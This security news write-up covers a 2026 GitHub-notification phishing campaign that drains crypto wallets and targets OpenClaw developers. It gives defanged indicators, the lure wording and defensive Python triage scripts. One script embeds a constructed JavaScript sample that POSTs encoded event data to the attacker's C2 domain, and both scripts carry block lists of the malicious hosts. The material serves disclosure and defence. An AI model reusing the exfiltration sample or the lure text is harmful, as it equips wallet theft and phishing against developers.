When OpenAI CEO Sam Altman publicly announced that OpenClaw creator Peter Steinberger would lead the company's push into personal AI agents, it was exactly the kind of high-profile moment that draws unwanted attention. The AI agent framework, which had already amassed 323,000 GitHub stars following its acquisition by OpenAI, found itself in a different set of crosshairs almost immediately: not security researchers, but crypto scammers with a precisely constructed phishing operation ready to deploy.
Tel Aviv-based cybersecurity firm OX Security published its findings on Wednesday, March 19, 2026, detailing an active campaign that uses GitHub's own notification infrastructure against the developers it is supposed to serve. The attack is not technically sophisticated in the traditional sense. There are no zero-days, no CVE exploits, no compromised supply chains. What it is, instead, is a tightly assembled sequence of social engineering steps that weaponizes trust — trust in GitHub notifications, trust in the OpenClaw brand, and trust that a message personalized to your contribution history must be legitimate.
Background: Why OpenClaw Became a Target
OpenClaw launched in November 2025 as a free, open-source autonomous AI agent that runs locally on a user's machine. Unlike chat-based AI tools that respond only when prompted, OpenClaw agents persist, wake on a schedule, store memory locally, and execute multi-step tasks autonomously — connecting to messaging apps, email accounts, calendars, and shell commands. That capability profile made it explosive in developer communities almost immediately.
OX Security had previously flagged the project — then operating under the name MoltBot before a rebrand — as a significant security concern for entirely different reasons. In a January 2026 report, the firm noted that the tool, at the time, stored credentials, API keys, and environment variables in cleartext. With 300-plus contributors and hundreds of thousands of users, the researchers warned that a single malicious commit or compromised developer account could introduce a backdoor affecting an enormous user base. That broader supply chain risk remains a separate concern from the phishing campaign described here.
The crypto opportunism that followed OpenClaw's rise was relentless from the start. Steinberger told Decrypt that spam was flooding the project's Discord "every half hour," eventually forcing a blanket ban on all coin-related discussion. That ban followed an incident in January 2026 in which scammers hijacked OpenClaw's old accounts to promote a Solana-based token called $CLAWD, which briefly surged to a market cap of approximately $16 million before collapsing more than 90% after Steinberger publicly denied any involvement. At that point, Steinberger issued an explicit, public statement on X: "I will never do a coin. Any project that lists me as coin owner is a scam."
"We would never do that. The project is open source and non-commercial." — Peter Steinberger, OpenClaw creator, responding to the March 2026 phishing campaign
None of that deterred the threat actors behind the current campaign. If anything, OpenClaw's continued growth — and its now-official association with OpenAI — made its developer community a more valuable target, not less.
How the Attack Is Structured
The campaign follows a four-stage sequence: target identification, delivery via GitHub, lure site, and wallet drain. Each stage is designed to look plausible to a developer who is not actively on guard against it.
Stage 1: Building the Target List from GitHub Stars
OX Security assesses that the attackers used GitHub's public star feature to enumerate users who had starred OpenClaw-related repositories. GitHub stars are publicly visible by default, meaning any account can query who has starred a given repository without any special access or credential. This turned what could have been a generic mass-phishing blast into something that felt personal: a message about a project the recipient had already actively engaged with.
Moshe Siman Tov Bustan, research team lead at OX Security and co-author of the report, confirmed to Decrypt that the campaign appeared to target specifically those users who had starred the OpenClaw GitHub repository. This precision targeting is what makes the lure convincing on first read. A message referencing a project you care about, arriving through a platform you trust, from an account that appears to be discussing that project, carries far more social weight than an unsolicited cold email.
Stage 2: The GitHub Delivery Mechanism
The delivery method is an abuse of GitHub's issue notification system. The threat actors created throwaway GitHub accounts — created the week of the campaign's launch and deleted within hours of execution — then opened issue threads in attacker-controlled repositories. Within those threads, they tagged the targeted developers by username.
GitHub sends email notifications when a user is tagged in an issue. That notification arrives in an inbox with GitHub's own branding and domain, lending it a degree of implicit legitimacy. The message in the issue thread told developers: "Appreciate your contributions on GitHub. We analyzed profiles and chose developers to get OpenClaw allocation." It then claimed the recipient had won $5,000 worth of $CLAW tokens and directed them to a link to collect the reward.
The $CLAW token does not exist. OpenClaw has no cryptocurrency component. Peter Steinberger has stated publicly and repeatedly that the project is open source and non-commercial, and that he will never launch a coin. Any communication claiming otherwise is a scam.
The link used in at least one observed instance was routed through a Google link-sharing redirect — linkshare[.]google/LnvVOHW6pravJMSu7 — before delivering the user to the actual phishing domain. Using a Google-branded redirect adds one more layer of apparent legitimacy and can cause some URL-scanning tools to miss the final destination.
Stage 3: The Cloned Website
The redirect lands the victim at token-claw[.]xyz, a near-pixel-perfect clone of the official openclaw.ai website. The visual similarity is deliberate and precise: someone who has visited the real OpenClaw site before will see what appear to be familiar interface elements and branding. The critical addition is a single button that does not exist on the legitimate site: "Connect your wallet."
The phishing page supports a wide range of cryptocurrency wallets to maximize the pool of potential victims. OX Security identified compatibility with MetaMask, Trust Wallet, WalletConnect, OKX Wallet, and Bybit Wallet. Covering five of the largest wallet platforms ensures that nearly any developer who holds crypto assets has a compatible wallet that will respond to the connection prompt.
The malicious domain is token-claw[.]xyz. The legitimate OpenClaw domain is openclaw.ai. These are entirely different domain registrations. If you have visited token-claw[.]xyz and connected a wallet, revoke all approvals immediately using your wallet's permissions manager or a tool such as revoke.cash.
Stage 4: The Wallet Drainer — eleven.js
The wallet-stealing logic is embedded inside a heavily obfuscated JavaScript file named eleven.js. Obfuscation — the deliberate transformation of readable code into a form that is functionally identical but nearly impossible to read — is a standard technique used to slow down analysis by security researchers and automated scanners. Common patterns include eval() calls, atob() base64 decoding, String.fromCharCode() character construction, and hex-encoded strings.
OX Security researchers deobfuscated the file as part of their analysis. What they found inside was a fully functional wallet drain operation with a command structure designed to track user interactions in real time and relay encoded data back to a separate command-and-control server.
The malware uses the domain watery-compost[.]today as its C2 server — the remote infrastructure that collects stolen data and enables the attacker to monitor victim interactions as they happen. The encoded payload sent to the C2 server includes wallet addresses, transaction values, and account names. The malware's built-in command vocabulary includes:
- PromtTx — triggers when the wallet connection prompt is displayed
- Approved — fires when the user approves a transaction or wallet connection
- Declined — fires when the user rejects the prompt
This command structure gives the attacker a real-time view of victim behavior, allowing them to track how far each target progresses through the wallet-connection flow.
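The obfuscation primitives and C2 command names described above lend themselves to a first-pass static triage of a script before anyone spends time on a full deobfuscation. The following is an added example, not OX Security's analysis tooling; the constructed SAMPLE_JS merely stands in for eleven.js, and the only indicator values used are the domains and command names quoted in this article.

```python
"""Static triage of a suspicious browser-side script (added example, not OX Security's
tooling): counts the obfuscation primitives the article lists, decodes atob() arguments
and backslash-x escapes, and reports known-indicator domains or C2 command names."""
import base64
import binascii
import re

OBFUSCATION_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "atob": re.compile(r"\batob\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode\b"),
    "hex_string": re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}"),
}
IOC_DOMAINS = {"token-claw.xyz", "watery-compost.today"}  # from the OX report
C2_COMMANDS = {"PromtTx", "Approved", "Declined"}  # from the OX report
STRING_RE = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")
ATOB_ARG_RE = re.compile(r"""\batob\s*\(\s*(["'])([A-Za-z0-9+/=]+)\1\s*\)""")
DOMAIN_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)
HEX_ESC_RE = re.compile(r"\\x([0-9a-fA-F]{2})")

def decoded_literals(source):
    """String literals plus their hex-unescaped and base64-decoded forms."""
    out = [m.group(2) for m in STRING_RE.finditer(source)]
    out += [HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), s) for s in out]
    for m in ATOB_ARG_RE.finditer(source):
        try:
            out.append(base64.b64decode(m.group(2), validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # not valid base64, skip it
    return out

def triage_script(source):
    """Count obfuscation primitives; extract indicator domains and C2 command names."""
    counts = {n: len(p.findall(source)) for n, p in OBFUSCATION_PATTERNS.items()}
    literals = decoded_literals(source)
    domains = {m.group(1).lower() for s in literals for m in DOMAIN_RE.finditer(s)}
    ioc_hits = sorted(domains & IOC_DOMAINS)
    cmd_hits = sorted(set(literals) & C2_COMMANDS)
    # A known indicator is decisive; otherwise three or more primitives earn a manual look.
    suspicious = bool(ioc_hits or cmd_hits) or sum(counts.values()) >= 3
    return {"counts": counts, "domains": sorted(domains), "ioc_domains": ioc_hits,
            "c2_commands": cmd_hits, "suspicious": suspicious}

# Constructed sample exercising the same primitives; NOT the real eleven.js.
SAMPLE_JS = r'''
var c2 = atob("C2_B64");
function r(a){ return String.fromCharCode.apply(null, a); }
var k = "\x6c\x6f\x63\x61\x6c\x53\x74\x6f\x72\x61\x67\x65";
eval(r([119,105,110,100,111,119]));
function report(ev){ fetch(c2, {method: "POST", body: btoa(JSON.stringify(ev))}); }
report({cmd: "PromtTx"}); report({cmd: "Approved"});
'''.replace("C2_B64", base64.b64encode(b"https://watery-compost.today/api").decode())
```

Running `triage_script(SAMPLE_JS)` surfaces the C2 domain hidden behind atob(), the two command names, and the hex-escaped "localStorage" reference, which is the kind of string a cleanup routine like "nuke" would need.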
The Nuke Function: Designed to Erase Evidence
One of the more deliberate aspects of the malware is a built-in self-cleanup function that OX Security's researchers named "nuke." Once the wallet drain operation is complete, this function wipes all wallet-stealing data from the browser's local storage. The purpose is forensic obstruction: if a victim later tries to investigate what happened by examining their browser's stored data, the evidence will already be gone. This signals that the people behind the campaign thought carefully about post-incident detection, not just initial delivery.
Block both token-claw[.]xyz and watery-compost[.]today at the DNS or firewall level across your environment immediately. These are the attacker's phishing domain and C2 server, respectively. OX Security issued this recommendation as part of its public disclosure.
Attacker Infrastructure and Attribution Indicators
OX Security researchers identified one cryptocurrency wallet address they assess belongs to the threat actor: 0x6981E9EA7023a8407E4B08ad97f186A5CBDaFCf5. This address is presumed to be the destination for any funds successfully drained from victim wallets. As of the time of OX Security's report, the address had not sent or received any funds, suggesting either that the campaign had not yet produced confirmed victims or that funds were being routed through an intermediary not yet identified.
Bustan told Decrypt that the campaign bears resemblance to a previous phishing operation that targeted Solana users on GitHub, though the relationship between the two campaigns was still under analysis at the time of publication. "We're still analyzing the behavior and the relation of these campaigns," he said.
The operational timeline for the fake accounts is telling. They were created the week of the campaign launch and deleted within hours of deploying the phishing messages. This hit-and-run account lifecycle is a deliberate evasion tactic: it compresses the window during which GitHub's abuse detection systems can flag the accounts, and it leaves almost no persistent infrastructure for researchers to trace after the fact. The accounts themselves are disposable; the malware infrastructure hosted at the C2 domain is where the actual operational persistence lives.
The Hacker News community discussion on this campaign noted the suspicious speed of account creation and deletion as one of the clearest red flags, alongside the novelty of the accounts and the implausibility of a legitimate project distributing tokens through GitHub issue threads from unknown accounts.
The Broader Pattern: Open Source Meets Crypto Opportunism
This campaign is not an isolated incident. It represents a pattern that security practitioners have been watching develop for several years: threat actors identify high-visibility open source projects, wait for a moment of peak attention, and then deploy social engineering infrastructure that rides the project's credibility. The targeting of GitHub's star feature as a prospecting tool is a refinement of this approach — it allows attackers to identify not just users of a project but users who have publicly signaled active interest in it.
The intersection of developer communities and cryptocurrency is particularly fertile ground for this attack type. Developers are statistically more likely to hold crypto assets than the general population. They are also accustomed to receiving legitimate notifications from GitHub about projects they follow, making the delivery vector feel normal. And the promise of a free token allocation — framed as a reward for contributions the recipient has actually made — is precisely calibrated to feel plausible rather than random.
OpenClaw's transition to a foundation-run open-source model, as noted by security researchers covering the campaign, means its contributor base will continue to grow. More stars, more visible contributors, more data points for attackers to use in building targeted lists. The surface area for this kind of attack expands with the project's success.
OX Security's Bustan summarized the fundamental vulnerability exposed by this campaign: the attack targeted users who had starred the OpenClaw GitHub repository, making the phishing attempt appear more targeted and credible. That precision is the point. A developer who receives a message referencing a project they actively follow, through a channel they legitimately use, is being given every social signal that the message is real. The technical sophistication of the payload is almost secondary to that social engineering foundation.
"During our analysis, we found only one address belonging to the threat actor, which hadn't sent or received any funds yet." — Moshe Siman Tov Bustan, research team lead, OX Security
What Developers Need to Do Right Now
OX Security's recommendations, combined with additional guidance from the security community's response to this campaign, break down into immediate actions and longer-term operational practices.
Immediate actions if you may have been affected: If you received a GitHub notification referencing an OpenClaw token allocation and visited any linked site, treat it as a compromise. Revoke all wallet approvals associated with that session using your wallet's built-in permissions manager or a third-party revocation tool. Do not wait to confirm whether funds have moved; revoke first.
If you connected a MetaMask, Trust Wallet, WalletConnect, OKX Wallet, or Bybit Wallet to any site offering CLAW tokens, check your wallet's transaction history for any approvals you do not recognize. An approval transaction — distinct from a transfer — grants a smart contract permission to move funds on your behalf. These approvals persist until explicitly revoked.
Infrastructure-level blocks: Block token-claw[.]xyz and watery-compost[.]today at the DNS or firewall level across your environment. These are the two known attacker-controlled domains identified in OX Security's analysis.
Operational hygiene going forward:
- Never connect a primary holding wallet to any site reached through a link in a GitHub issue, email notification, or social media message. Type official domains directly into the browser address bar.
- Treat any GitHub issue promoting a token giveaway, airdrop, or allocation as suspicious by default, especially if the account posting it was created recently or has minimal history.
- Verify the age and activity history of any GitHub account before engaging with its content. Throwaway accounts created days before a campaign launch are a reliable signal of malicious intent.
- Use a dedicated wallet with minimal funds for any legitimate airdrop or dApp interaction. Never expose a cold storage or primary holdings wallet to a web-based connection prompt.
- Consider auditing your GitHub profile's public visibility settings. Public starring behavior is one data point attackers are actively exploiting for targeting.
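The account-age, wording and link checks in the list above can be applied mechanically to a mention before anyone clicks. The script below is an added example, not OX Security's or GitHub's code; the author record, dates, counts and redirect path are constructed, and the trusted-host list (github.com and openclaw.ai) is an assumption for a team that only follows the official project site.

```python
"""Triage of a GitHub issue-mention notification (added example, not OX Security's or
GitHub's code). Scores the signals the write-up describes: a days-old, low-history author
account, token-giveaway wording, redirector links, and link hosts outside a trusted set."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from urllib.parse import urlparse

TRUSTED_HOSTS = {"github.com", "openclaw.ai"}  # assumption: the only hosts we expect
KNOWN_REDIRECTORS = {"linkshare.google"}  # redirector used in the campaign
IOC_HOSTS = {"token-claw.xyz", "watery-compost.today"}  # OX Security indicators
LURE_RE = re.compile(r"\b(?:allocation|airdrop|giveaway|tokens?|reward)\b|\$[A-Z]{3,6}\b"
                     r"|connect your wallet", re.I)
URL_RE = re.compile(r"https?://[^\s)>\]]+")
MAX_NEW_ACCOUNT_DAYS = 7  # the campaign's accounts were created the week it launched

@dataclass
class Author:
    login: str
    created_at: datetime
    public_repos: int
    followers: int

def triage_mention(author, body, notified_at):
    """Return the reasons a mention looks like a lure; three or more means do not click."""
    reasons = []
    age_days = (notified_at - author.created_at).days
    if age_days <= MAX_NEW_ACCOUNT_DAYS:
        reasons.append(f"author account is {age_days} days old")
    if author.public_repos == 0 and author.followers == 0:
        reasons.append("author has no public repos and no followers")
    lure = sorted(set(LURE_RE.findall(body)))
    if lure:
        reasons.append("giveaway wording: " + ", ".join(lure))
    for url in URL_RE.findall(body):
        host = (urlparse(url).hostname or "").lower()
        if host in IOC_HOSTS:
            reasons.append(f"link to known malicious host {host}")
        elif host in KNOWN_REDIRECTORS:
            reasons.append(f"link routed through redirector {host}")
        elif host not in TRUSTED_HOSTS:
            reasons.append(f"link to untrusted host {host}")
    return {"score": len(reasons), "reasons": reasons, "block": len(reasons) >= 3}

# Constructed samples: the lure mirrors the wording quoted in the article; the dates,
# counts and redirect path are invented placeholders.
NOW = datetime(2026, 3, 16, tzinfo=timezone.utc)
LURE_AUTHOR = Author("fresh-acct-123", NOW - timedelta(days=3), 0, 0)
LURE_BODY = ("Appreciate your contributions on GitHub. We analyzed profiles and chose "
             "developers to get OpenClaw allocation. You won $5,000 worth of $CLAW tokens. "
             "Claim: https://linkshare.google/EXAMPLE-PATH")
OK_AUTHOR = Author("longtime-maintainer", datetime(2019, 5, 1, tzinfo=timezone.utc), 40, 120)
OK_BODY = "Thanks for the report, fixed in https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/pull/1"
```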
Key Takeaways
- The attack vector is GitHub notifications, not email spam: Delivery through GitHub's own tagging and notification system lends false legitimacy. Standard spam filters will not catch it. Developer awareness is the primary defense at this stage.
- eleven.js is a purpose-built wallet drainer with forensic countermeasures: The "nuke" function is not an afterthought — it signals a campaign designed with post-incident detection in mind. If you connected a wallet to this site, standard browser-based forensics may no longer show you what happened.
- The attacker's wallet address is known but has not yet transacted: 0x6981E9EA7023a8407E4B08ad97f186A5CBDaFCf5 is on record with researchers. Monitoring this address for activity provides one signal of whether the campaign successfully drained any wallets after OX Security's public disclosure.
- The $CLAW token does not exist: OpenClaw has no cryptocurrency component. Steinberger's January 2026 statement on X remains operative: any project or token claiming his involvement is a scam.
- Block both malicious domains immediately: token-claw[.]xyz and watery-compost[.]today should be blocked at the DNS or firewall level across any environment whose users may include GitHub developers.
As of OX Security's disclosure on March 19, 2026, no confirmed victim losses have been publicly reported. The campaign's infrastructure, however, is fully operational. The absence of confirmed victims at the time of reporting reflects either the effectiveness of community awareness — social media reports suggest many developers identified the campaign as fraudulent almost immediately — or the early stage of the operation's execution window before researchers disrupted it through public disclosure. Either way, the threat is live and the domains remain active.
Sources
- OX Security — OpenClaw Developers Targeted in Crypto-Wallet Phishing Attack (March 19, 2026)
- Decrypt — OpenClaw Developers Lured in GitHub Phishing Campaign Targeting Crypto Wallets (March 19, 2026)
- CoinDesk — OpenClaw Developers Targeted in GitHub Phishing Scam Offering Fake Token Airdrops (March 19, 2026)
- CoinTelegraph — OpenClaw Phishing Attack Targets Developers on GitHub (March 19, 2026)
- crypto.news — GitHub Phishing Scam Uses OpenClaw Branding to Lure Developers Into Wallet Drain (March 19, 2026)
- OX Security — One Step Away From a Massive Data Breach: What We Found Inside MoltBot (January 30, 2026)
- DEV Community — How the OpenClaw GitHub Phishing Attack Worked — And How to Defend Against It (March 20, 2026)